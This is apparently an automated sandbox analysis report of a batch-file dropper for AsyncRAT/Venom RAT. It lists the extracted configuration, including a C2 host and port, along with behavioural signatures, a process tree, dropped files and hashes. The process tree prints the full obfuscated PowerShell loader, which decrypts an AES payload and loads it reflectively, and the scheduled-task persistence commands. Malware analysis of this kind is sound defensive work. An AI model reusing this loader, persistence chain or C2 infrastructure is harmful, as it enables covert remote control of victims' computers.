Analysis

  • max time kernel
    540s
  • max time network
    438s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-08-2024 17:46

General

  • Target

    Virus.bat

  • Size

    282KB

  • MD5

    6321399b9f2a346f9dcd5ddcf0d04837

  • SHA1

    491a27119ef1c8cbe7bafc270cd61d473f404efa

  • SHA256

    4ba666d2a43f4f36ee814d77cf103645e3091dcda9ee350a72f1857a49d62f2d

  • SHA512

    30507019b3f140736a41537662936ce6a3b76b9b38e597e462772dab6cbdfb7821dd10904d379b2ece5911c11ec68c5b2500d2938b0ea08d2837418349ef166b

  • SSDEEP

    6144:NoS40TIG7jmb/lrUlPp4L2yoXhb2yz+FAjFQD4mT5nNfxWFzk/7+JX:NoS40Tr7M/ilRa2jsyCFrL5nB0iSX

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

C2

born-brandon.gl.at.ply.gg:55020

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes
  • delay

    1

  • install

    true

  • install_file

    Installer.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Async RAT payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Virus.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1960
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1640
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:3752
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cyfcDUDNs/jAdenkeODuxCd4AdqjQy0Et9vvWdRGzLU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jfRO1w90VFlfdExtAE1Tww=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UhuLY=New-Object System.IO.MemoryStream(,$param_var); $VByGC=New-Object System.IO.MemoryStream; $qzeuw=New-Object System.IO.Compression.GZipStream($UhuLY, [IO.Compression.CompressionMode]::Decompress); $qzeuw.CopyTo($VByGC); $qzeuw.Dispose(); $UhuLY.Dispose(); $VByGC.Dispose(); $VByGC.ToArray();}function execute_function($param_var,$param2_var){ $nxOxu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uXzPY=$nxOxu.EntryPoint; $uXzPY.Invoke($null, $param2_var);}$lfFvl = 'C:\Users\Admin\AppData\Local\Temp\Virus.bat';$host.UI.RawUI.WindowTitle = $lfFvl;$ebhTC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lfFvl).Split([Environment]::NewLine);foreach ($aEMsK in $ebhTC) { if ($aEMsK.StartsWith(':: ')) { $RMQmu=$aEMsK.Substring(3); break; }}$payloads_var=[string[]]$RMQmu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2208
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_338_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_338.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3288
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_338.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4236
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_338.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1376
            • C:\Windows\system32\net.exe
              net file
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4616
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                6⤵
                  PID:1824
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cyfcDUDNs/jAdenkeODuxCd4AdqjQy0Et9vvWdRGzLU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jfRO1w90VFlfdExtAE1Tww=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UhuLY=New-Object System.IO.MemoryStream(,$param_var); $VByGC=New-Object System.IO.MemoryStream; $qzeuw=New-Object System.IO.Compression.GZipStream($UhuLY, [IO.Compression.CompressionMode]::Decompress); $qzeuw.CopyTo($VByGC); $qzeuw.Dispose(); $UhuLY.Dispose(); $VByGC.Dispose(); $VByGC.ToArray();}function execute_function($param_var,$param2_var){ $nxOxu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uXzPY=$nxOxu.EntryPoint; $uXzPY.Invoke($null, $param2_var);}$lfFvl = 'C:\Users\Admin\AppData\Roaming\startup_str_338.bat';$host.UI.RawUI.WindowTitle = $lfFvl;$ebhTC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lfFvl).Split([Environment]::NewLine);foreach ($aEMsK in $ebhTC) { if ($aEMsK.StartsWith(':: ')) { $RMQmu=$aEMsK.Substring(3); break; }}$payloads_var=[string[]]$RMQmu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:1564
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Installer" /tr '"C:\Users\Admin\AppData\Roaming\Installer.exe"' & exit
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3932
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc onlogon /rl highest /tn "Installer" /tr '"C:\Users\Admin\AppData\Roaming\Installer.exe"'
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:2972
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDADF.tmp.bat""
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4120
                  • C:\Windows\system32\timeout.exe
                    timeout 3
                    7⤵
                    • Delays execution with timeout.exe
                    PID:4300
                  • C:\Users\Admin\AppData\Roaming\Installer.exe
                    "C:\Users\Admin\AppData\Roaming\Installer.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1924
      • C:\Windows\system32\taskmgr.exe
        "C:\Windows\system32\taskmgr.exe" /4
        1⤵
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:4280
      • C:\Windows\system32\taskmgr.exe
        "C:\Windows\system32\taskmgr.exe" /4
        1⤵
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:2100

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

        Filesize

        64KB

        MD5

        d2fb266b97caff2086bf0fa74eddb6b2

        SHA1

        2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

        SHA256

        b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

        SHA512

        c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

      • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

        Filesize

        4B

        MD5

        f49655f856acb8884cc0ace29216f511

        SHA1

        cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

        SHA256

        7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

        SHA512

        599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

      • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

        Filesize

        944B

        MD5

        6bd369f7c74a28194c991ed1404da30f

        SHA1

        0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

        SHA256

        878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

        SHA512

        8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        661739d384d9dfd807a089721202900b

        SHA1

        5b2c5d6a7122b4ce849dc98e79a7713038feac55

        SHA256

        70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

        SHA512

        81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        2379085ef743f418e526fd71ba869b25

        SHA1

        fa06aab17b3d0d2d93f93c68c16f8716a0ae0223

        SHA256

        51770c4bad1027b970a118f7a706f6805570716ff07b0786423b400ec977d489

        SHA512

        1f70c7fb84da459efc40d826066420b266b1e2789cd3df787ecf304148c077a658693965653bceb692c1714548812a9a4d0d59a197c0807b6734ffb385a9d4b1

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xtvzkgw2.fo3.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\tmpDADF.tmp.bat

        Filesize

        153B

        MD5

        7c2193201e3a3ba17c2ef8999d0a4f0f

        SHA1

        4fca32021026797da2f567c94e0df6ab555a4691

        SHA256

        216cefa5fdd59777c1f77aef3fe0e2d23752c3c5b8dfa0b7faf46faf8ac19be9

        SHA512

        07ac44f05d4edf1a03ca66b46e47c02c305f11f4d86be0dde53ca9cbeff9ff618fa385c858732d1352935f1bbbc3e9faf042da6167fdb300ce6d679f558aab11

      • C:\Users\Admin\AppData\Roaming\Installer.exe

        Filesize

        442KB

        MD5

        04029e121a0cfa5991749937dd22a1d9

        SHA1

        f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

        SHA256

        9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

        SHA512

        6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

      • C:\Users\Admin\AppData\Roaming\startup_str_338.bat

        Filesize

        282KB

        MD5

        6321399b9f2a346f9dcd5ddcf0d04837

        SHA1

        491a27119ef1c8cbe7bafc270cd61d473f404efa

        SHA256

        4ba666d2a43f4f36ee814d77cf103645e3091dcda9ee350a72f1857a49d62f2d

        SHA512

        30507019b3f140736a41537662936ce6a3b76b9b38e597e462772dab6cbdfb7821dd10904d379b2ece5911c11ec68c5b2500d2938b0ea08d2837418349ef166b

      • C:\Users\Admin\AppData\Roaming\startup_str_338.vbs

        Filesize

        115B

        MD5

        bd4034bf772783539f05d1c7967f3c14

        SHA1

        b698a712f522a54139f1e4bdeb71bcc8eefffdaf

        SHA256

        f7127008518c221a6c0310f80c12d932935f2e38296816e252fdb14a830016f8

        SHA512

        8d503773668a47b1b9576874f5aa7d1a6172ce6edf76b0daffd67cbc93e1d48b975b781b0188ae25cea7f3f2333229129313aae8ce2bf24b1a764ac990e4242c

      • memory/1564-62-0x000002539B360000-0x000002539B376000-memory.dmp

        Filesize

        88KB

      • memory/1924-80-0x00000113F4960000-0x00000113F49A4000-memory.dmp

        Filesize

        272KB

      • memory/1924-81-0x00000113F4A30000-0x00000113F4AA6000-memory.dmp

        Filesize

        472KB

      • memory/2100-93-0x00000212495E0000-0x00000212495E1000-memory.dmp

        Filesize

        4KB

      • memory/2100-94-0x00000212495E0000-0x00000212495E1000-memory.dmp

        Filesize

        4KB

      • memory/2100-87-0x00000212495E0000-0x00000212495E1000-memory.dmp

        Filesize

        4KB

      • memory/2100-92-0x00000212495E0000-0x00000212495E1000-memory.dmp

        Filesize

        4KB

      • memory/2100-97-0x00000212495E0000-0x00000212495E1000-memory.dmp

        Filesize

        4KB

      • memory/2100-96-0x00000212495E0000-0x00000212495E1000-memory.dmp

        Filesize

        4KB

      • memory/2100-86-0x00000212495E0000-0x00000212495E1000-memory.dmp

        Filesize

        4KB

      • memory/2100-85-0x00000212495E0000-0x00000212495E1000-memory.dmp

        Filesize

        4KB

      • memory/2100-95-0x00000212495E0000-0x00000212495E1000-memory.dmp

        Filesize

        4KB

      • memory/2208-0-0x00007FFBE8ED3000-0x00007FFBE8ED5000-memory.dmp

        Filesize

        8KB

      • memory/2208-14-0x000001B9C44A0000-0x000001B9C44D6000-memory.dmp

        Filesize

        216KB

      • memory/2208-13-0x000001B9AA140000-0x000001B9AA148000-memory.dmp

        Filesize

        32KB

      • memory/2208-12-0x00007FFBE8ED0000-0x00007FFBE9991000-memory.dmp

        Filesize

        10.8MB

      • memory/2208-63-0x00007FFBE8ED0000-0x00007FFBE9991000-memory.dmp

        Filesize

        10.8MB

      • memory/2208-11-0x00007FFBE8ED0000-0x00007FFBE9991000-memory.dmp

        Filesize

        10.8MB

      • memory/2208-10-0x000001B9AA160000-0x000001B9AA182000-memory.dmp

        Filesize

        136KB

      • memory/3288-30-0x00007FFBE8ED0000-0x00007FFBE9991000-memory.dmp

        Filesize

        10.8MB

      • memory/3288-27-0x00007FFBE8ED0000-0x00007FFBE9991000-memory.dmp

        Filesize

        10.8MB

      • memory/3288-25-0x00007FFBE8ED0000-0x00007FFBE9991000-memory.dmp

        Filesize

        10.8MB

      • memory/3288-26-0x00007FFBE8ED0000-0x00007FFBE9991000-memory.dmp

        Filesize

        10.8MB

      • memory/4280-44-0x000001BB501E0000-0x000001BB501E1000-memory.dmp

        Filesize

        4KB

      • memory/4280-42-0x000001BB501E0000-0x000001BB501E1000-memory.dmp

        Filesize

        4KB

      • memory/4280-43-0x000001BB501E0000-0x000001BB501E1000-memory.dmp

        Filesize

        4KB

      • memory/4280-38-0x000001BB501E0000-0x000001BB501E1000-memory.dmp

        Filesize

        4KB

      • memory/4280-32-0x000001BB501E0000-0x000001BB501E1000-memory.dmp

        Filesize

        4KB

      • memory/4280-33-0x000001BB501E0000-0x000001BB501E1000-memory.dmp

        Filesize

        4KB

      • memory/4280-34-0x000001BB501E0000-0x000001BB501E1000-memory.dmp

        Filesize

        4KB

      • memory/4280-41-0x000001BB501E0000-0x000001BB501E1000-memory.dmp

        Filesize

        4KB

      • memory/4280-40-0x000001BB501E0000-0x000001BB501E1000-memory.dmp

        Filesize

        4KB

      • memory/4280-39-0x000001BB501E0000-0x000001BB501E1000-memory.dmp

        Filesize

        4KB